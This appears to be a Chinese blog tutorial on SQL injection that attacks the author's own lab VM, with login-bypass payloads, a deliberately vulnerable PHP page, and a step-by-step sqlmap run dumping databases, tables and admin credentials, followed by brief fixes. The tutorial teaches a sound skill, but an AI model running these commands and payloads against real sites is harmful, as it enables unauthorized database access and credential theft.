sqlmap 进行sql漏洞注入
有一款工具叫sqlmap
主要用于识别sql
漏洞并注入,这里我就写一篇教程教大家如何使用。
因为sql
注入是非法的,所以我就使用两台自己的虚拟机进行测试,请大家不要在别人的网站上搞破坏。(现在大部分网站已经没有sql
漏洞了,修复方法也很简单)
一、什么是sql
漏洞
要搞清楚sql
漏洞,首先要搞清楚sql
语句。sql
全称Structured Query Language
(结构化查询语言),是一种编程语言,主要应用于数据库查询。一般服务器安装的数据库有Microsoft Access
、mysql
、postgreysql
等等。这里我使用mysql
。下面我就举一些查询的例子。
SELECT * FROM admin WHERE user = "test" AND pass = "123456";
这一句就是从admin
表中查找user
为test
并且pass
为123456
的记录,并将满足要求的记录输出,一般登录页面就是用这条语句查询的。
但是如果我输入的密码是" OR "1"="1
,用户名是test
,那么sql
语句岂不是
SELECT * FROM admin WHERE user = "test" AND pass = "" OR "1"="1";
很明显,WHERE
后的表达式一定返回true
,于是mysql
会将每条记录都输出,而网站误以为这个用户名是正确的,然后让你以test
的身份登录。
如果网站还设有管理权限,那么你可以试试密码为" OR "1"="1" AND writable = TRUE AND ""="
,这样,sql
查询语句就是
SELECT * FROM admin WHERE user = "test" AND pass = "" OR "1"="1" AND writable = TRUE AND ""="";
其中user = "test" AND pass = "" OR "1"="1"
始终返回true
,所以实际条件为
writable = TRUE AND ""=""
,即writable = TRUE
,于是mysql
会将writable
为true
的记录输出
还有一种,是查看文章,一般是通过GET
参数id
来查询的
SELECT * FROM articles WHERE id = 1;
如果网站没有对id
进行校验,那么不妨用id=1 AND 1=1
来测试
SELECT * FROM articles WHERE id = 1 AND 1=1;
没报错说明可能可以注入,改成id=1 AND 1=2
,如果说文章没有找到,进一步说明可以注入,在改成id="
,如果mysql
报错,一般网站会显示出来,那么基本上就算可以注入了。
我就用这个例子进行注入
二、搭建环境
我选用的是kali linux 17.3
作为攻击者,Ubuntu lts 18.04
作为受害服务器,先搭建服务器,可以参考Ubuntu18.04 如何搭建Apache2+php5.6+mysql服务器,把可注入网页放在/article.php
,其代码如下。
<?phpif (!isset($_GET['id'])){echo '没有设置参数id';die(1);
}$host = 'localhost';
$user = 'test';
$pass = '123456';
$conn = mysql_connect($host,$user,$pass);
if (!$conn){echo '无法连接至数据库';
}$sql = 'SELECT * FROM website.articles WHERE id = '.$_GET['id']; // 漏洞就在这里
$query = mysql_query($sql,$conn);
$row = mysql_fetch_array($query);
if (!$row){echo '访问的文章不存在';
} else {echo $row['content'];
}mysql_close($conn);?>
搭建好整个网站后,在mysql
中的情形如下
当然,我注入不可能是为了看到那几篇文章,其实我通过网页也可以直接看到它,我的目的是看到一些隐私数据,比如admin
表中的账号和密码
三、注入前测试
服务器地址为192.168.3.59
,先访问网页查看是否可以注入。
显然,网页本身没有什么问题。使用id="
进行测试。
显然mysql
发现sql
有语法错误,所以没有任何查询结果。
和预期完全相符,说明这个页面可以注入。
四、sqlmap
注入
对于kali linux
,sqlmap
默认安装。
对于Ubuntu
,使用apt install sqlmap
进行安装
对于其他系统,到官网下载源码,sqlmap
使用python
编写的,所以可能需要安装python
下面开始注入。
sqlmap -u '192.168.3.59/article.php?id=1
,一定要加入GET
参数,不然sqlmap
不知道使用什么参数去注入。输出差不多是
root@kali:~# sqlmap -u '192.168.3.59/article.php?id=1'_____H_____ ___[,]_____ ___ ___ {1.1.11#stable}
|_ -| . [.] | .'| . |
|___|_ [(]_|_|_|__,| _||_|V |_| http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 11:30:43[11:30:43] [INFO] resuming back-end DBMS 'mysql'
[11:30:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: id=1 AND 1817=1817Type: AND/OR time-based blindTitle: MySQL >= 5.0.12 AND time-based blindPayload: id=1 AND SLEEP(5)Type: UNION queryTitle: Generic UNION query (NULL) - 2 columnsPayload: id=-2184 UNION ALL SELECT NULL,CONCAT(0x716b707071,0x517964767671746351415543654b4b794171664b78754b57434b70774c6b56434b6a46786a4d5a76,0x717a706271)-- BgjA
---
[11:30:43] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[11:30:43] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.3.59'[*] shutting down at 11:30:43
从上述输出来看,可以注入,下面正式开始注入。
sqlmap -u '192.168.3.59/article.php?id=1' --dbs
,输出是
root@kali:~# sqlmap -u '192.168.3.59/article.php?id=1' --dbs_____H_____ ___[.]_____ ___ ___ {1.1.11#stable}
|_ -| . [,] | .'| . |
|___|_ [(]_|_|_|__,| _||_|V |_| http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 11:37:43[11:37:43] [INFO] resuming back-end DBMS 'mysql'
[11:37:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: id=1 AND 1817=1817Type: AND/OR time-based blindTitle: MySQL >= 5.0.12 AND time-based blindPayload: id=1 AND SLEEP(5)Type: UNION queryTitle: Generic UNION query (NULL) - 2 columnsPayload: id=-2184 UNION ALL SELECT NULL,CONCAT(0x716b707071,0x517964767671746351415543654b4b794171664b78754b57434b70774c6b56434b6a46786a4d5a76,0x717a706271)-- BgjA
---
[11:37:43] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[11:37:43] [INFO] fetching database names
[11:37:43] [INFO] the SQL query used returns 2 entries
[11:37:43] [INFO] retrieved: information_schema
[11:37:43] [INFO] retrieved: website
available databases [2]:
[*] information_schema
[*] website[11:37:43] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.3.59'[*] shutting down at 11:37:43
注入发现两个数据库information_schema
和website
information_schema
主要是mysql
数据库、表、列的信息,没有什么,website
是网站的数据,对这个数据库进行注入。
sqlmap -u '192.168.3.59/article.php?id=1 -D website --tables
,输出为
root@kali:~# sqlmap -u '192.168.3.59/article.php?id=1' -D website --tables_____H_____ ___[(]_____ ___ ___ {1.1.11#stable}
|_ -| . [.] | .'| . |
|___|_ [)]_|_|_|__,| _||_|V |_| http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 11:41:14[11:41:14] [INFO] resuming back-end DBMS 'mysql'
[11:41:14] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: id=1 AND 1817=1817Type: AND/OR time-based blindTitle: MySQL >= 5.0.12 AND time-based blindPayload: id=1 AND SLEEP(5)Type: UNION queryTitle: Generic UNION query (NULL) - 2 columnsPayload: id=-2184 UNION ALL SELECT NULL,CONCAT(0x716b707071,0x517964767671746351415543654b4b794171664b78754b57434b70774c6b56434b6a46786a4d5a76,0x717a706271)-- BgjA
---
[11:41:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[11:41:14] [INFO] fetching tables for database: 'website'
[11:41:14] [INFO] the SQL query used returns 2 entries
[11:41:14] [INFO] retrieved: admin
[11:41:14] [INFO] retrieved: articles
Database: website
[2 tables]
+----------+
| admin |
| articles |
+----------+[11:41:14] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.3.59'[*] shutting down at 11:41:14
发现有两张表admin
、articles
,作为攻击者肯定注入admin
sqlmap -u '192.168.3.59/article.php?id=1' -D website -T admin --columns
,输出为
root@kali:~# sqlmap -u '192.168.3.59/article.php?id=1' -D website -T admin --columns_____H_____ ___["]_____ ___ ___ {1.1.11#stable}
|_ -| . [(] | .'| . |
|___|_ [)]_|_|_|__,| _||_|V |_| http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 11:43:46[11:43:46] [INFO] resuming back-end DBMS 'mysql'
[11:43:46] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: id=1 AND 1817=1817Type: AND/OR time-based blindTitle: MySQL >= 5.0.12 AND time-based blindPayload: id=1 AND SLEEP(5)Type: UNION queryTitle: Generic UNION query (NULL) - 2 columnsPayload: id=-2184 UNION ALL SELECT NULL,CONCAT(0x716b707071,0x517964767671746351415543654b4b794171664b78754b57434b70774c6b56434b6a46786a4d5a76,0x717a706271)-- BgjA
---
[11:43:46] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[11:43:46] [INFO] fetching columns for table 'admin' in database 'website'
[11:43:47] [INFO] the SQL query used returns 3 entries
[11:43:47] [INFO] retrieved: "id","int(11)"
[11:43:47] [INFO] retrieved: "user","text"
[11:43:47] [INFO] retrieved: "pass","text"
Database: website
Table: admin
[3 columns]
+--------+---------+
| Column | Type |
+--------+---------+
| user | text |
| id | int(11) |
| pass | text |
+--------+---------+[11:43:47] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.3.59'[*] shutting down at 11:43:47
注入得到了三列user
、id
、pass
,只要得到user
和pass
,就能得到密码(一般是网站后台管理的登录密码)
sqlmap -u '192.168.3.59/article.php?id=1' -D website -T admin -C user,pass --dump
,输出为
root@kali:~# sqlmap -u '192.168.3.59/article.php?id=1' -D website -T admin -C user,pass --dump_____H_____ ___["]_____ ___ ___ {1.1.11#stable}
|_ -| . [.] | .'| . |
|___|_ [)]_|_|_|__,| _||_|V |_| http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 11:47:33[11:47:33] [INFO] resuming back-end DBMS 'mysql'
[11:47:33] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: id=1 AND 1817=1817Type: AND/OR time-based blindTitle: MySQL >= 5.0.12 AND time-based blindPayload: id=1 AND SLEEP(5)Type: UNION queryTitle: Generic UNION query (NULL) - 2 columnsPayload: id=-2184 UNION ALL SELECT NULL,CONCAT(0x716b707071,0x517964767671746351415543654b4b794171664b78754b57434b70774c6b56434b6a46786a4d5a76,0x717a706271)-- BgjA
---
[11:47:33] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[11:47:33] [INFO] fetching entries of column(s) '`user`, pass' for table 'admin' in database 'website'
[11:47:33] [INFO] the SQL query used returns 3 entries
[11:47:33] [INFO] retrieved: "test1","123456"
[11:47:33] [INFO] retrieved: "test2","123456"
[11:47:33] [INFO] retrieved: "test3","123456"
Database: website
Table: admin
[3 entries]
+--------+--------+
| user | pass |
+--------+--------+
| test1 | 123456 |
| test2 | 123456 |
| test3 | 123456 |
+--------+--------+[11:47:33] [INFO] table 'website.admin' dumped to CSV file '/root/.sqlmap/output/192.168.3.59/dump/website/admin.csv'
[11:47:33] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.3.59'[*] shutting down at 11:47:33
成功得到了管理员账号和密码,注入也就到此结束。
五、如何修复sql
漏洞
就拿我这个网页漏洞距离,修复前是
<?phpif (!isset($_GET['id'])){echo '没有设置参数id';die(1);
}$host = 'localhost';
$user = 'test';
$pass = '123456';
$conn = mysql_connect($host,$user,$pass);
if (!$conn){echo '无法连接至数据库';
}$sql = 'SELECT * FROM website.articles WHERE id = '.$_GET['id']; // 漏洞就在这里
$query = mysql_query($sql,$conn);
$row = mysql_fetch_array($query);
if (!$row){echo '访问的文章不存在';
} else {echo $row['content'];
}mysql_close($conn);?>
导致sql
注入的原因是使用了非法字符,那么有很多解决办法。
- 对参数进行检查,比如检查
id
是否为一个整数 - 对字符串进行转移,因为有时候不得不用到引号,
php
可以用addslashes
函数 - 安装现成软件(虽然我不知道是什么原理,但似乎很多网站都安装了什么D盾之类的)
六、实战
实际上,sql
注入也没这么简单,有时候需要用字典去猜表名(kali
自带字典),甚至还有注入不了的情况(可能是因为字典不够),即使注入成功获得密码也有可能找不到登录入口点(一般是admin
或login
文件夹中),所以本文仅仅是提供一个方法不能保证注入成功,希望对大家能有帮助。
sqlmap 进行sql漏洞注入相关推荐
- 关于SQL漏洞注入(Ado.Net)
SQL漏洞注入是常见的一种攻击方式,我们可以通过一些简单的方式来预防.看一下我们经常写的代码: 1: /// <summary> 2: /// 不安全的登录代码 3: /// </s ...
- JeecgBoot 2.x版本SQL漏洞补丁发布——响应零日漏洞修复计划
漏洞编码:HW21-0499 产品名字:JeecgBoot低代码平台 问题: JEECG系统存在SQL注入0day漏洞 处理情况: 已经处理 处理方案: 针对存在SQL漏洞注入风险的接口,采用加签名认 ...
- Sqlmap查找SQL注入漏洞入门
Sqlmap查找SQL注入漏洞入门 1.安装sqlmap sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞.注意:sqlmap只是用来检测和利用sql注入点的,使 ...
- 使用sqlmap检测sql注入漏洞
一. sql注入概述并安装sqlmap漏洞查看工具 1. sql注入概述 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命 ...
- sqlmap注入教程linux,Linux Sqlmap检测sql注入漏洞工具安装使用教程
Sqlmap工具 什么是SQLmap? SQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹.访问底层文件系统.执行命令) sql注 ...
- 自学渗透测试:使用 DVWA 和 SQLmap 探寻 SQL 注入攻击与防范
数据来源 本文仅用于信息安全学习,请遵守相关法律法规,严禁用于非法途径.若观众因此作出任何危害网络安全的行为,后果自负,与本人无关. 01 耳熟能详的SQ注入是什么? 关于SQL注入漏洞,维基 ...
- SQL注入之什么是加密注入|二次漏洞注入|DNSlog注入
加密注入.二次漏洞注入.DNSlog注入 加密注入: 什么是加密注入??下面将由一个例子阐述: 以sqlilabs-less-21为例 1.在登录界面输入账户密码提交抓包 2.在抓到这条数据,将uma ...
- sqlmap之sql注入原理利用
一.什么是SQL注入? 所谓SQL注入,就是通过把SQL命令插入到web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令.具体来说,它是利用现有的应用程序,将(恶意的) ...
- sqlmap 注入字典_使用sqlmap进行sql注入
早就听说BT5sqlmap功能很强大,今天终于下决心拒绝DOTA和苍老师的诱惑,静下心来研究研究这个传说中的sqlmap!由于在虚拟机里面用的蛋疼,我直接在真机上也装了个BT5的系统,嘻嘻··,那感觉 ...
最新文章
- mysql如何实现读提交锁_MySQL学习笔记(二)—MySQL事务及锁详解
- kata_小规模流处理kata。 第2部分:RxJava 1.x / 2.x
- mysql中的if [not] exists
- Alluxio完成C轮5000万美元融资,新设中国区总部力拓国内市场
- 蓝桥杯第七届省赛JAVA真题----压缩变换
- java上传头像插件_JSP+SpringMVC框架使用WebUploader插件实现注册时候头像图片的异步上传功能...
- BZOJ3833 : [Poi2014]Solar lamps
- Linux 2.6.39.1 Hello world 驱动总结
- Oracle之PL/SQL学习笔记之有名块练习
- 3说明书_怎么才能做好产品说明书翻译?知行翻译公司总结了3点
- java jsp 特殊标签_JSP复习(四):JSTL标记
- c语言编写的程序不具备移植性,《C语言》试卷1
- springboot2.4+nettyWebServerApplicationContext@15f51c50 has been closed already问题解决
- AB_PLC编程软件RSLogix_500_与PLC通讯详细说明
- oracle大对象入库测试用例,Oracle数据库测试方案.docx
- 老年程序员的出路何在
- android.intent.action大全和用法收集
- navicat连接pgsql报错:authentication method 10 not supported
- 股票6题(Aced)
- 在WORD表格中如何实现加法?
热门文章
- 工程制图 ( 标准件与常用件)
- 详解预训练模型、图神经网络、模型压缩、知识图谱、信息抽取、序列模型、深度学习、语法分析、文本处理...
- Centos7 安装和配置MySQL5.7
- 微信好友特征数据分析及可视化
- java 加法 溢出_java实现两个大数相加,可能出现溢出错误
- geoserver加载mysql_GeoServer+MySQL的配置过程
- JVM 核心技术 调优分析与面试经验
- vue不是内部或外部命令
- 完全二叉树最小深度_树与二叉树递归c++
- bootstrap下拉选择框选中事件_CAD制图初学入门之CAD软件中布局功能详解